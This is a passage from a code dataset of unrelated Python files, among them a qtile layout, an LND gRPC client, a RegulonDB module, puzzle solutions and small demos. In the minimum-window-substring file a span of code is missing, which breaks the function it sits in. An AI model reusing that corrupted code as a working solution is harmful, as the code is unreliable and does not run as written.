\"config.yml\")\n\ntf.keras.backend.clear_session()\n\nparser = argparse.ArgumentParser(prog=\"Vocab Training with SentencePiece\")\n\nparser.add_argument(\"--config\", type=str, default=DEFAULT_YAML,\n help=\"The file path of model configuration file\")\n\nparser.add_argument(\"--devices\", type=int, nargs=\"*\", default=[0],\n help=\"Devices' ids to apply distributed training\")\n\nargs = 
parser.parse_args()\n\nstrategy = setup_strategy(args.devices)\n\nfrom tensorflow_asr.configs.config import Config\nfrom tensorflow_asr.featurizers.text_featurizers import SentencePieceFeaturizer\n\nconfig = Config(args.config)\n\nlogger.info(\"Generating subwords ...\")\ntext_featurizer = SentencePieceFeaturizer.build_from_corpus(\n config.decoder_config\n)\n","repo_name":"TensorSpeech/TensorFlowASR","sub_path":"scripts/generate_vocab_sentencepiece.py","file_name":"generate_vocab_sentencepiece.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":877,"dataset":"github-code","pt":"53"} +{"seq_id":"8184670641","text":"import numpy as np\n\nimport tbv.utils.frustum_utils as frustum_utils\n\n\ndef test_get_frustum_side_normals() -> None:\n \"\"\"Ensure we can compute normals to left and right clipping planes accurately.\n\n Scenario uses a frustum with a fov of 90 degrees (PI/2 radians). Suppose\n in the egovehicle frame, the camera looks directly down the +x direction,\n from the origin.\n \"\"\"\n fov_theta = np.pi / 2\n l_normal, r_normal = frustum_utils.get_frustum_side_normals(fov_theta)\n\n # normals for left and right clipping planes point into the frustum\n gt_l_normal = np.array([1.0, -1.0]) / np.sqrt(2)\n assert np.allclose(l_normal, gt_l_normal)\n\n gt_r_normal = np.array([1.0, 1.0]) / np.sqrt(2)\n assert np.allclose(r_normal, gt_r_normal)\n\n # frustum with width 53 degrees\n # when we point in (x,y)=(2,1) direction (narrower frustum)\n fov_theta = np.deg2rad(53.13010235415598)\n l_normal, r_normal = frustum_utils.get_frustum_side_normals(fov_theta)\n\n gt_l_normal = np.array([1.0, -2.0]) / np.linalg.norm(np.array([2, 1]))\n assert np.allclose(l_normal, gt_l_normal)\n\n gt_r_normal = np.array([1.0, 2.0]) / np.linalg.norm(np.array([2, 1]))\n assert np.allclose(r_normal, gt_r_normal)\n\n\n\n# def test_get_frustum_parameters() -> None:\n# \"\"\" \"\"\"\n# log_ids = [\"allison-arkansas-wdc-new-bollards\", \"new-bike-lane-v5\"]\n\n# data_dir = \"/home/jlambert/mcd_extraction_output_dir_2020_07_17/logs\"\n# dl = SimpleArgoverseTrackingDataLoader(data_dir=data_dir, labels_dir=data_dir)\n\n# for log_id in log_ids:\n# log_calib_data = dl.get_log_calibration_data(log_id)\n\n# # for each camera frustum\n# for camera_name in RING_CAMERA_LIST:\n# logger.info(f\"On camera {camera_name}\")\n# camera_config = get_calibration_config(log_calib_data, camera_name)\n# yaw, fov = frustum_utils.get_frustum_parameters(camera_config)\n\n# if camera_name == \"ring_front_center\":\n# assert np.isclose(yaw, -0.01, atol=1)\n# assert np.isclose(fov, 85.21, atol=1)\n# if camera_name == \"ring_front_left\":\n# assert np.isclose(yaw, 45.11, atol=1)\n# assert np.isclose(fov, 101.08, atol=1)\n# if camera_name == \"ring_side_left\":\n# assert np.isclose(yaw, 99.23, atol=1)\n# assert np.isclose(fov, 101.10, atol=1)\n# if camera_name == \"ring_rear_left\":\n# assert np.isclose(yaw, 153.21, atol=1)\n# assert np.isclose(fov, 101.04, atol=1)\n# if camera_name == \"ring_rear_right\":\n# assert np.isclose(yaw, -152.99, atol=1)\n# assert np.isclose(fov, 101.14, atol=1)\n# if camera_name == \"ring_side_right\":\n# assert np.isclose(yaw, -98.97, atol=1)\n# assert np.isclose(fov, 101.14, atol=1)\n# if camera_name == \"ring_front_right\":\n# assert np.isclose(yaw, -44.99, atol=1)\n# assert np.isclose(fov, 101.10, 
atol=1)\n","repo_name":"johnwlambert/tbv","sub_path":"tests/utils/test_frustum_utils.py","file_name":"test_frustum_utils.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"53"} +{"seq_id":"2338162731","text":"import sys\nfrom itertools import combinations\n\ninput = sys.stdin.readline\n\nn, k = map(int, input().split())\n\nwords_bit = []\n# 꼭 배워야되는 알파벳\nessential = {'a', 'c', 'i', 'n', 't'}\n# 모든 단어들에서 나오는 알파벳 (essential은 제외)\nalpha = set()\n# 결과값\nresult = 0\n\nfor _ in range(n):\n # 입력받은 단어에서 essential은 빼준다.\n word = set(list(input().rstrip())) - essential\n\n # essential 단어를 제외하고 k-5개 보다 많은 단어는 절대 배우지 못하는 단어\n if(len(word) > k-5):\n continue\n\n # alpha 집합에 단어의 알파벳을 합집합으로 넣어준다.\n alpha = alpha.union(word)\n # 단어에 포함되는 알파벳은 비트로 표현\n bit = 0\n for c in word:\n bit |= (1 << ord(c)-97)\n words_bit.append(bit)\n\n# k가 5보다 작으면 essential 단어도 못배우기 때문\n# 배울수 있는 단어가 0개\nif(k < 5 or not words_bit):\n print(0)\n exit(0)\n\n# alpha 집합에 든 알파벳의 숫자와 최대로 배울수 있는 k-5중에 작은 수로 조합을 만들어준다.\nfor temp in list(combinations(alpha, min(len(alpha), k-5))):\n # 조합을 비트로 표현\n bit = 0\n # 현재 조합으로 만들 수 있는 단어의 수\n cnt = 0\n\n for c in temp:\n bit |= (1 << ord(c)-97)\n\n for wb in words_bit:\n # 현재 조합의 비트와 단어의 비트를 and연산해서 단어의 비트가 나오면 만들 수 있는 단어이다.\n if(bit & wb == wb):\n cnt += 1\n\n result = max(result, cnt)\n\nprint(result)\n","repo_name":"97DongHyeokOH/Algorithm_Study","sub_path":"BAEKJOON/Practice/비트마스킹/1062.py","file_name":"1062.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4084513416","text":"#!/usr/bin/python3\n\ndef main():\n # dicionario = { 'um' : 1, 'dois' : 2, 'tres' : 3, 'quatro' : 4 }\n dicionario = dict(\n um = 1, dois = 2, tres = 3, quatro = 'quatro'\n )\n dicionario['cinco'] = 5\n \n print(dicionario)\n \n for k in dicionario:\n print(k, dicionario[k])\n \n for k in dicionario:\n print(k)\n \n for k in sorted(dicionario.keys()):\n print(k, dicionario[k]) \n \nif __name__ == \"__main__\" : main()","repo_name":"phoenixproject/python","sub_path":"Python3_CursoSon/3/dicionarios.py","file_name":"dicionarios.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"30537249914","text":"import random\n\ndef jogar():\n print(\"*********************************\")\n print(\"BEM VINDO AO JOGO DE ADIVINHAÇÃO\")\n print(\"*********************************\")\n\n numero_secreto =random.randrange(1,101) # importei essa função para gerar um numero aleatorio numero_secreto\" é uma variavel\n total_de_tentativas = 0\n pontos = 1000\n\n print(\"Escolha um nivel de dificuldade:\")\n print(\"(1)FÁCIL (2) MÉDIO (3) DIFÍCIL\")\n\n nivel = int(input(\"Defina um nivel : \"))\n\n if(nivel ==1):\n total_de_tentativas = 15\n elif(nivel ==2):\n total_de_tentativas = 10\n else:\n total_de_tentativas = 5\n\n for rodada in range(1,total_de_tentativas + 1):\n print(\"Tentativa {} de {}\".format(rodada,total_de_tentativas))\n chute_str = input(\"Digite um numero entre 1 e 100: \")\n print(\"Você digitou \", chute_str)\n chute = int(chute_str)\n\n if(chute < 1 or chute > 100 ):\n print(\"Você tem que digitar um numero de 1 a 100!\")\n continue\n\n acertou = chute == numero_secreto\n maior = chute > numero_secreto\n menor = chute < numero_secreto\n\n if(acertou):\n print(\"Voce acertou e fez {} pontos!\".format(pontos))\n break\n else:\n 
if(maior):\n print(\"Você errou! o numero secreto é menor \\n\")\n elif(menor):\n print(\"Você errou! o numero secreto é maior \\n\")\n pontos_perdidos = abs(numero_secreto - chute) # toda vez que chutar vai tirar os pontos com o valor do chute caso erre por exempo = 40 - 20 = 20\n pontos = pontos - pontos_perdidos\n\n print(\"FIM DO JOGO\")\n\nif(__name__ == \"__main__\"):\n jogar()\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Fiacco/jogos","sub_path":"adivinhacao.py","file_name":"adivinhacao.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70759852329","text":"from libqtile.layout.base import _SimpleLayoutBase\nfrom libqtile.log_utils import logger\nfrom math import sqrt, floor, ceil\nfrom itertools import repeat\n\noverrides = {\n 3: [(0, 0, 1/2, 1), (1/2, 0, 1/2, 1/2), (1/2, 1/2, 1/2, 1/2)],\n 8: [(0, 0, 1/3, 1/3), (1/3, 0, 1/3, 1/3), (2/3, 0, 1/3, 1/3),\n (0, 1/3, 1/3, 1/3), (1/3, 1/3, 1/3, 1/3), (2/3, 1/3, 1/3, 1/3),\n (0, 2/3, 1/2, 1/3), (1/2, 2/3, 1/2, 1/3)],\n}\n\nclass AutoTile(_SimpleLayoutBase):\n \"\"\"Tiles windows using a simple autotiling function, but can be overriden by set layouts for each number of windows\"\"\"\n\n defaults = [\n (\"border_focus\", \"#ff0000\", \"Border colour(s) for the focused window.\"),\n (\"border_normal\", \"#000000\", \"Border colour(s) for the un-focused windows.\"),\n (\"border_width\", 1, \"Border width.\"),\n (\"margin\", 0, \"Margin of the layout (int or list of ints [N E S W])\"),\n (\"overrides\", overrides, \"default: Overrides layout for 3 and 8 windows;\\n\" +\n \"{}: Does not override layout for 3 and 8 windows;\\n\" +\n \"{dict}: Pass in custom overrides in the form `{n: [(x, y, w, h),...],...}`\"),\n ]\n\n def __init__(self, **config):\n _SimpleLayoutBase.__init__(self, **config)\n self.add_defaults(AutoTile.defaults)\n self.recalc = True\n self.edit = False\n self.old = {}\n self.layout_info = []\n self.last_size = None\n self.last_screen = None\n if type(self.overrides) is not dict:\n self.overrides = {}\n\n\n def clone(self, group):\n return _SimpleLayoutBase.clone(self, group)\n\n def add(self, w):\n print('add')\n self.recalc = True\n self.clients.append(w)\n def remove(self, w):\n self.recalc = True\n return _SimpleLayoutBase.remove(self, w)\n\n def get_layout(self, screen, n):\n do = ((screen.width, screen.x),\n (screen.height, screen.y),\n (screen.width, 0),\n (screen.height, 0))\n\n try:\n wins = self.overrides[n]\n except KeyError:\n r = sqrt(n)\n rows = list(repeat(ceil(r), floor(r)))\n\n i, j = 0, -1\n while sum(rows) > n:\n if rows[i] == rows[i+1]:\n rows[i] = rows[i] - 1\n else:\n i += 1\n while sum(rows) < n:\n try:\n if rows[j] == rows[j-1]:\n rows[j] = rows[j] + 1\n else:\n j -= 1\n except IndexError:\n rows[0] += 1\n j = -1\n\n wins, i = [], 0\n l = len(rows)\n for row in rows:\n for j in range(row):\n wins.append((j/row, i/l, 1/row, 1/l))\n i += 1\n\n out = []\n for win in wins:\n out.append(list((d * l) + o for l, (d, o) in zip(win, do)))\n return out\n\n def configure(self, win, screen):\n if not self.last_screen or self.last_screen != screen:\n self.last_screen = screen\n self.recalc = True\n if self.last_size and not self.dirty:\n if screen.width != self.last_size[0] or screen.height != self.last_size[1]:\n self.recalc = True\n if self.recalc == True:\n self.layout_info = self.get_layout(screen, len(self.clients))\n self.recalc = False\n try:\n index = self.clients.index(win)\n except ValueError:\n win.hide()\n 
return\n x, y, w, h = self.layout_info[index]\n\n if win.has_focus:\n bc = self.border_focus\n else:\n bc = self.border_normal\n win.place(\n int(x),\n int(y),\n int(w) - self.border_width * 2,\n int(h) - self.border_width * 2,\n self.border_width,\n bc,\n margin=self.margin,\n )\n win.unhide()\n\n cmd_down = _SimpleLayoutBase.next\n cmd_up = _SimpleLayoutBase.previous\n\n cmd_previous = _SimpleLayoutBase.previous\n cmd_next = _SimpleLayoutBase.next\n\n def cmd_shuffle_down(self):\n if self.clients:\n self.clients.rotate_down()\n self.group.layout_all()\n\n def cmd_shuffle_up(self):\n if self.clients:\n self.clients.rotate_up()\n self.group.layout_all()\n\n def cmd_settings_new(self, **config):\n for item in config:\n try:\n self.old[item] = getattr(self, item)\n setattr(self, item, config[item])\n except AttributeError:\n pass\n self.recalc = True\n self.group.layout_all()\n\n def cmd_settings_revert(self, **config):\n for item in config:\n setattr(self, item, self.old[item])\n self.old.pop(item, None)\n self.recalc = True\n self.group.layout_all()\n\n def cmd_settings_toggle(self, **config):\n edit = False\n for item in config:\n if config[item] != getattr(self, item):\n edit = True\n break\n\n if edit:\n self.cmd_settings_new(**config)\n else:\n self.cmd_settings_revert(**config)\n","repo_name":"dairnarth/.dotfiles","sub_path":"stow/qtile/.config/qtile/modules/autotile.py","file_name":"autotile.py","file_ext":"py","file_size_in_byte":5335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7609871509","text":"import os\nimport codecs\nimport grpc\nimport lightning_pb2 as ln\nimport lightning_pb2_grpc as lnrpc\n\nclass NodeConnection:\n def __init__(self, node):\n try:\n self.node = node\n self.cert = open(os.path.expanduser(node[\"cert\"]), 'rb').read()\n macaroon_bytes = open(os.path.expanduser(node[\"admin_macaroon\"]), 'rb').read()\n self.macaroon = codecs.encode(macaroon_bytes, 'hex')\n os.environ[\"GRPC_SSL_CIPHER_SUITES\"] = 'HIGH+ECDSA'\n metadata = [('macaroon', self.macaroon)]\n auth_credentials = grpc.metadata_call_credentials(lambda context, callback: callback(metadata, None))\n ssl_credentials = grpc.ssl_channel_credentials(self.cert)\n channel_credentials = grpc.composite_channel_credentials(ssl_credentials, auth_credentials)\n channel = grpc.secure_channel(self.node[\"channel\"], channel_credentials)\n self.stub = lnrpc.LightningStub(channel)\n except FileNotFoundError as e:\n print(f\"File not found error at {self.node['name']}: {e}\")\n except grpc.RpcError as e:\n print(f\"GRPC error at {self.node['name']}: {e}\")\n except Exception as e:\n print(f\"An error occurred connecting to {self.node['name']}: {e}\")\n\n def get_info(self):\n try:\n response = self.stub.GetInfo(ln.GetInfoRequest())\n return response, \"\"\n except grpc.RpcError as e:\n if e.details() == \"permission denied\":\n return \"\", f\"Error en credenciales {self.node['name']}: {e.details()}\"\n return \"\", f\"Error: Revisa la informacion del nodo al que intentaste acceder por favor.\\n Mas informacion del error:\\n{e.details()}\"\n\n def request_open_channel(self, pubkey, funding_amount, push_amount):\n try:\n request = ln.OpenChannelRequest(\n node_pubkey=codecs.decode(str(pubkey), 'hex'),\n local_funding_amount=int(funding_amount),\n push_sat=int(push_amount),\n private=False,\n )\n response = self.stub.OpenChannelSync(request)\n return response, \"\"\n except grpc.RpcError as e:\n if e.details() == \"permission denied\":\n return \"\", 
f\"Error grpc en credenciales {self.node['name']}: {e.details()}\"\n elif \"synced\" in e.details():\n return \"\", f\"Error grpc al abrir canal parece que es un problema de sincronización, mina un bloque.\"\n return \"\", f\"Error grpc al abrir canal: {e.details()}\"\n except Exception as e:\n return \"\", f\"Error al abrir canal: {e}\"\n\n def check_pending_channels(self):\n try:\n response = self.stub.PendingChannels(ln.PendingChannelsRequest())\n return response, \"\"\n except grpc.RpcError as e:\n if e.details() == \"permission denied\":\n return \"\", f\"Error en credenciales {self.node['name']}: {e.details()}\"\n return \"\", f\"Error al revisar canales pendientes.{e.details()}\"\n\n def close_channel(self, channel_point, force_close=True):\n try:\n params = channel_point.split(':')\n channel_point = ln.ChannelPoint(\n funding_txid_str=params[0],\n output_index=int(params[1])\n )\n request = ln.CloseChannelRequest(\n channel_point=channel_point,\n force=True,\n )\n response = self.stub.CloseChannel(request)\n return response, \"\"\n except grpc.RpcError as e:\n if e.details() == \"permission denied\":\n return \"\", f\"Error en credenciales {self.node['name']}: {e.details()}\"\n return \"\", f\"Error al cerrar canal: {e.details()}\"\n\n def create_invoice(self, invoice_amt):\n try:\n preimage = os.urandom(32)\n preimage_hex = preimage.hex()\n request = ln.Invoice(\n memo=\"my transaction\",\n r_preimage=codecs.decode(preimage_hex, 'hex_codec'),\n value=int(invoice_amt),\n description_hash=codecs.decode(preimage_hex, 'hex_codec'),\n expiry=3600,\n cltv_expiry=144,\n private=False,\n is_keysend=False,\n )\n response = self.stub.AddInvoice(request)\n return response, \"\"\n except grpc.RpcError as e:\n if e.details() == \"permission denied\":\n return \"\", f\"Error en credenciales {self.node['name']}: {e.details()}\"\n return \"\", f\"Error al crear la factura: {e.details()}\"\n\n def pay_invoice(self, payment_request):\n try:\n lowercased_request = payment_request.lower()\n request = ln.SendRequest(\n payment_request=lowercased_request,\n allow_self_payment=False,\n )\n response = self.stub.SendPaymentSync(request)\n payment_list = self.stub.ListPayments(request)\n if len(payment_list) > 0:\n for payment in payment_list.payments:\n if payment.payment_request == lowercased_request:\n return response, \"\"\n else:\n return \"\", \"Error al pagar la factura, revisa que tus canales no estén pendientes.\"\n \n \n except grpc.RpcError as e:\n if e.details() == \"permission denied\":\n return \"\", f\"Error en credenciales {self.node['name']}: {e.details()}\"\n elif \"synced\" in e.details():\n return \"\", f\"Error grpc al abrir canal parece que es un problema de sincronización, mina un bloque.\"\n return \"\", f\"Error grpc al pagar la factura: {e.details()}\"\n except Exception as e:\n if \"ListPaymentsResponse\" in str(e):\n return \"\", f\"Error al pagar la factura, revisa que tus canales no estén pendientes.\"\n return \"\", f\"Error al pagar la factura: {e}\"\n\n def get_invoices(self):\n try:\n request = ln.ListInvoiceRequest(\n num_max_invoices=15,\n )\n response = self.stub.ListInvoices(request)\n return response, \"\"\n except grpc.RpcError as e:\n if e.details() == \"permission denied\":\n return \"\", f\"Error en credenciales {self.node['name']}: {e.details()}\"\n return \"\", f\"Error al buscar las facturas creadas: {e.details()}\"\n \n def get_payments(self):\n try:\n request = ln.ListPaymentsRequest(\n max_payments=15,\n )\n response = self.stub.ListPayments(request)\n 
return response, \"\"\n except grpc.RpcError as e:\n if e.details() == \"permission denied\":\n return \"\", f\"Error en credenciales {self.node['name']}: {e.details()}\"\n return \"\", f\"Error al buscar pagos realizados: {e.details()}\"\n\n def decode_pr(self, payment_request):\n try:\n request = ln.PayReqString(\n pay_req=str(payment_request),\n )\n response = self.stub.DecodePayReq(request)\n return response, \"\"\n except grpc.RpcError as e:\n if e.details() == \"permission denied\":\n return \"\", f\"Error en credenciales {self.node['name']}: {e.details()}\"\n return \"\", f\"Error al decifrar peticion de pago: {e.details()}\"\n\n def node_info(self):\n try:\n return self.node, \"\"\n except grpc.RpcError as e:\n if e.details() == \"permission denied\":\n return \"\", f\"Error en credenciales {self.node['name']}: {e.details()}\"\n return \"\", f\"Error de grpc al pedir informacion del nodo: {e.details()}\"\n except Exception as e:\n return \"\", \"Error al pedir informacion del nodo.\"\n","repo_name":"JoeBlock99/LNBitcoinGuide","sub_path":"lnd.py","file_name":"lnd.py","file_ext":"py","file_size_in_byte":7899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74077269289","text":"import multigenomic_api\nimport re\nfrom src.datamarts.domain.general.biological_base import BiologicalBase\nfrom src.datamarts.domain.operon_datamart.reg_binding_sites.regulatory_interactions import RegulatoryInteractions\n\n\nclass RegulatoryBindingSites(BiologicalBase):\n def __init__(self, reg_entity):\n super().__init__([], [], None)\n self.tf_binding_sites = reg_entity\n\n @property\n def tf_binding_sites(self):\n return self._tf_binding_sites\n\n @tf_binding_sites.setter\n def tf_binding_sites(self, reg_entity):\n self._tf_binding_sites = []\n tf_ri_dict = {}\n '''\n Update this when sRNA is pushed on regulondbmultigenomic with mechanism in RI's\n '''\n regulatory_ints = \\\n multigenomic_api.regulatory_interactions.find_regulatory_interactions_by_reg_entity_id(reg_entity)\n tf_binding_sites_dict = self.fill_tf_binding_sites_dict(regulatory_ints)\n if tf_binding_sites_dict:\n self._tf_binding_sites = tf_binding_sites_dict\n\n def to_dict(self):\n return self._tf_binding_sites\n\n @staticmethod\n def fill_tf_binding_sites_dict(ris):\n transcription_factor_binding_sites = []\n for ri in ris:\n repressor_ris = []\n activator_ris = []\n reg_sites_dict = {}\n mechanism = ri.mechanism\n if ri.regulatory_sites_id:\n reg_site = multigenomic_api.regulatory_sites.find_by_id(ri.regulatory_sites_id)\n reg_sites_dict = RegulatorySites(reg_site).to_dict()\n reg_int = RegulatoryInteractions(ri, reg_sites_dict).to_dict()\n if ri.function == \"repressor\":\n repressor_ris.append(reg_int)\n elif ri.function == \"activator\":\n activator_ris.append(reg_int)\n regulator = get_abbr_regulator_name(ri.regulator)\n if len(repressor_ris) != 0:\n transcription_factor_binding_sites.append({\n \"regulator\": {\n \"_id\": regulator[\"id\"],\n \"name\": regulator[\"name\"],\n \"function\": \"repressor\"\n },\n \"regulatoryInteractions\": repressor_ris,\n \"function\": \"repressor\",\n \"mechanism\": mechanism\n })\n if len(activator_ris) != 0:\n transcription_factor_binding_sites.append({\n \"regulator\": {\n \"_id\": regulator[\"id\"],\n \"name\": regulator[\"name\"],\n \"function\": \"activator\"\n },\n \"regulatoryInteractions\": activator_ris,\n \"function\": \"activator\",\n \"mechanism\": mechanism\n })\n return transcription_factor_binding_sites\n\n\ndef 
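The NodeConnection constructor in the lnd.py record above layers macaroon call credentials over TLS to talk to LND; its Spanish error strings (e.g. "Error en credenciales" = "credentials error") report gRPC failures. A trimmed sketch of just the channel setup, with placeholder paths and host:

import codecs, os
import grpc
import lightning_pb2_grpc as lnrpc  # generated LND stubs, as in the record

def connect(host: str, cert_path: str, macaroon_path: str) -> lnrpc.LightningStub:
    os.environ["GRPC_SSL_CIPHER_SUITES"] = "HIGH+ECDSA"  # required by lnd's TLS setup
    cert = open(os.path.expanduser(cert_path), "rb").read()
    macaroon = codecs.encode(open(os.path.expanduser(macaroon_path), "rb").read(), "hex")
    # per-call credentials: attach the macaroon as gRPC metadata on every RPC
    auth = grpc.metadata_call_credentials(
        lambda ctx, cb: cb([("macaroon", macaroon)], None))
    creds = grpc.composite_channel_credentials(grpc.ssl_channel_credentials(cert), auth)
    return lnrpc.LightningStub(grpc.secure_channel(host, creds))

Note that close_channel in the record hardcodes force=True instead of passing its force_close parameter; presumably force=force_close was intended.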
get_abbr_regulator_name(regulator):\n reg_id = regulator.id\n reg_name = regulator.name\n\n if regulator.type == \"product\":\n reg = multigenomic_api.products.find_by_id(regulator.id)\n if reg.abbreviated_name:\n reg_name = reg.abbreviated_name\n\n tf = multigenomic_api.transcription_factors.find_tf_id_by_conformation_id(regulator.id)\n if tf is None:\n tf = multigenomic_api.transcription_factors.find_by_name(regulator.name)\n if tf:\n reg_id = tf.id\n reg_name = tf.abbreviated_name\n else:\n reg_id = tf.id\n reg_name = tf.abbreviated_name\n return {\n \"id\": reg_id,\n \"name\": reg_name\n }\n\n\nclass RegulatorySites(BiologicalBase):\n def __init__(self, reg_site):\n super().__init__([], reg_site.citations, reg_site.note)\n self.reg_site = reg_site\n\n def to_dict(self):\n reg_sites_dict = {\n \"_id\": self.reg_site.id,\n \"centerEndPosition\": self.reg_site.absolute_position,\n \"citations\": self.citations,\n \"leftEndPosition\": self.reg_site.left_end_position,\n \"length\": self.reg_site.length,\n \"note\": self.formatted_note,\n \"rightEndPosition\": self.reg_site.right_end_position,\n \"sequence\": self.reg_site.sequence\n }\n return reg_sites_dict\n","repo_name":"regulondbunam/RegulonDB-Datamarts","sub_path":"src/datamarts/domain/operon_datamart/regulator_binding_sites.py","file_name":"regulator_binding_sites.py","file_ext":"py","file_size_in_byte":4233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18141893895","text":"#!/usr/bin/env python3\n\nimport itertools\n\n\ndef prng(p):\n s = 290797\n while True:\n yield s % p\n s = s * s % 50515093\n\n\ndef main():\n # p = 3\n # q = 10000\n # m = 20\n p = 61\n q = 10 ** 7\n m = 10\n T = list(itertools.islice(prng(p), q + 1))\n result = (\n sum(T[n] * ((p ** n) - 1) // (p - 1) for n in range(1, m))\n + ((p ** m) - 1) // (p - 1) * sum(T[n] for n in range(m, q + 1))\n ) % (p ** m)\n print(result)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"zmwangx/Project-Euler","sub_path":"288/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"28898222047","text":"# https://leetcode.com/problems/minimum-window-substring/\n# https://leetcode.com/problems/minimum-window-substring/discuss/226911/Python-two-pointer-sliding-window-with-explanation\n\nimport collections\n\ndef check_valid(s, t):\n t_map = {c:0 for c in t}\n\n for c in t:\n if s.find(c, t_map[c])==-1:\n return False\n else:\n t_map[c] = s.find(c, t_map[c])+1\n return True\n\n\n\n\ndef minWindow(s, t):\n L, R = 0, 0\n res = s\n # for i in range(len(s)+len(t)):\n while R<=len(s):\n print(s[L:R], L, R)\n if check_valid(s[L:R], t):\n while check_valid(s[L:R], t):\n if len(s[L:R]) 0:\n res_counter[c] += 1\n R += 1\n # valid\n valid = res_counter & t_counter\n # if sum(valid.values()) >= len(t):\n while sum(valid.values()) == len(t):\n res = s[L:R] if len(s[L:R]) < len(res) or res == '' else res\n if t_counter[s[L]] > 0:\n res_counter[s[L]] -= 1\n L += 1\n valid = res_counter & t_counter\n return res\n\ndef minWindow3(search_string, target):\n from collections import Counter\n target_letter_counts = Counter(target)\n start = 0\n end = 0\n min_window = \"\"\n target_len = len(target)\n for end in range(len(search_string)):\n # If we see a target letter, decrease the total target letter count\n if target_letter_counts[search_string[end]] > 0:\n target_len -= 1\n\n 
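The Project Euler 288 record above relies on the identity v_p(N!) = sum T_n * (p^n - 1)/(p - 1) for N = sum T_n * p^n with digits T_n < p, and caps the geometric series at n = m because 1 + p + ... + p^(n-1) is congruent to 1 + p + ... + p^(m-1) mod p^m for n >= m. A small cross-check of that digit formula against Legendre's formula, reusing the p = 3 test value from the record's comments (n = 1234 is an arbitrary check value of mine):

def legendre_vp_factorial(n: int, p: int) -> int:
    # exponent of p in n! via Legendre's formula: sum of floor(n / p^k)
    count, pk = 0, p
    while pk <= n:
        count += n // pk
        pk *= p
    return count

def digit_formula(digits: list[int], p: int) -> int:
    # same exponent from the base-p digits T_k of n
    return sum(t * (p**k - 1) // (p - 1) for k, t in enumerate(digits))

p, n = 3, 1234
digits, m = [], n
while m:
    digits.append(m % p)  # least-significant digit first
    m //= p
assert digit_formula(digits, p) == legendre_vp_factorial(n, p)  # both give 614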
target_letter_counts[search_string[end]] -= 1\n print(target_letter_counts, target_len)\n # If all letters in the target are found:\n while (target_len == 0):\n window_len = end - start + 1\n if not min_window or window_len < len(min_window):\n # Note the new minimum window\n min_window = search_string[start: end + 1]\n\n # Increase the letter count of the current letter\n target_letter_counts[search_string[start]] += 1\n\n # If all target letters have been seen and now, a target letter is seen with count > 0\n # Increase the target length to be found. This will break out of the loop\n if target_letter_counts[search_string[start]] > 0:\n target_len += 1\n start += 1\n return min_window\n\n\n# sliding window, make useless characters to be negative, TC:O(N+M), SC:O(M)\ndef minWindow4(s, t):\n # TC:O(M)\n counter_t = collections.Counter(t)\n res = \"\"\n L = 0\n count = len(t)\n # TC:O(N)\n for R in range(len(s)):\n # expand until window is valid\n if counter_t[s[R]] > 0:\n count -= 1\n # make useless characters to be negative\n counter_t[s[R]] -= 1\n # contract(move L) until count != 0\n while count == 0:\n res = s[L:R + 1] if R - L + 1 < len(res) or res == \"\" else res\n counter_t[s[L]] += 1\n # if useless, counter alway < 0\n if counter_t[s[L]] > 0:\n count += 1\n L += 1\n return res\n\n\ns = \"cabefgecdaecf\"\nt = \"caec\"\n\n\nres = minWindow(s, t)\n\n\nres2 = minWindow2(s,t)\n\nres3 = minWindow3(s,t)","repo_name":"ychanc2104/LeetCode","sub_path":"Minimum Window Substring.py","file_name":"Minimum Window Substring.py","file_ext":"py","file_size_in_byte":3467,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"37298457248","text":"# Core Pkgs\r\nimport streamlit as st\r\nimport pandas as pd\r\n\r\n\r\ndef main():\r\n st.title(\"Salary Calculator\")\r\n menu = [\"Home\",\"Dataset\",\"About\"]\r\n choice = st.sidebar.selectbox(\"Menu\",menu)\r\n\r\n if choice == \"Home\":\r\n st.subheader(\"Forms Tutorial\")\r\n\r\n #Salary Calucaltor\r\n #Combine forms + columns\r\n with st.form(key='cal'):\r\n col1,col2,col3 = st.columns([3,2,1])\r\n\r\n with col1:\r\n amount = st.number_input(\"時薪:\")\r\n with col2:\r\n hour_per_week = st.number_input(\"工作幾小時?\")\r\n with col3:\r\n st.text(\"Salary\")\r\n submit_salary = st.form_submit_button(label=\"計算\")\r\n\r\n if submit_salary:\r\n with st.expander(\"Results\"):\r\n daily = [amount * 8]\r\n weekly = [amount*hour_per_week]\r\n df = pd.DataFrame({'hourly':amount,'daily':daily,'weekly':weekly})\r\n st.dataframe(df)\r\n\r\n #Method 1\r\n with st.form(key='forml'):\r\n firstname = st.text_input(\"firstname:\")\r\n lastname = st.text_input(\"lastname:\")\r\n dob = st.date_input(\"Date of Birth\")\r\n\r\n submit_button = st.form_submit_button(label='SignUP')\r\n if submit_button:\r\n st.success(\"hello sigup successful\")\r\n #Method 2\r\n form2 = st.form(key='form2',clear_on_submit=True)\r\n username = form2.text_input(\"Username:\")\r\n jobtype = form2.selectbox(\"Job\",[\"DA\",\"DS\"])\r\n submit_button2 = form2.form_submit_button(\"Login\")\r\n\r\n if submit_button2:\r\n st.write(username.upper())\r\n\r\n\r\n else:\r\n st.subheader(\"About\")\r\n\r\nif __name__ == '__main__':\r\n\tmain()","repo_name":"Xubwei/Streamlit","sub_path":"12_Calculate.py","file_name":"12_Calculate.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 